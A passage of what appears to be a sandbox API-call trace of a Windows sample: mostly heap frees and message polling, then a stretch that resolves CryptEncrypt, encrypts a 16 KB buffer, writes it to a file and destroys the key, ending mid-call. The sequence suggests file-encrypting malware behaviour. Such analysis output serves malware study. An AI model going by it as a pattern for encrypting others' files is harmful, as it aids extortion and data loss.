[0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a82260 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0104.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.250] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x408e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4090) returned 1 [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] CharLowerBuffW (in: lpsz="byte[16528]", cchLength=0xb | out: lpsz="byte[16528]") returned 0xb [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.250] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.250] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.251] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a82260*, pdwDataLen=0x8cef60*=0x408e, dwBufLen=0x4090 | out: pbData=0x2a82260*, pdwDataLen=0x8cef60*=0x4090) returned 1 [0104.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.252] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0104.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.252] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0104.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.252] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.254] WriteFile (in: hFile=0x44c, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x4090, lpOverlapped=0x0) returned 1 [0104.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.303] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0104.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.303] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0104.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.303] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.303] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0104.303] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.303] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0104.303] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0104.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0104.348] CryptDestroyKey (hKey=0x9a4580) returned 1 [0104.348] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.348] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.348] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0104.348] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.348] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0104.348] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.348] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.348] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0104.348] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0104.348] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0104.349] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.349] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.349] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0104.349] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.349] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.349] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0104.349] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.349] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0104.349] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.349] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.349] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0104.349] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.349] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0104.349] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.350] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.350] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.350] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.350] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.350] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, 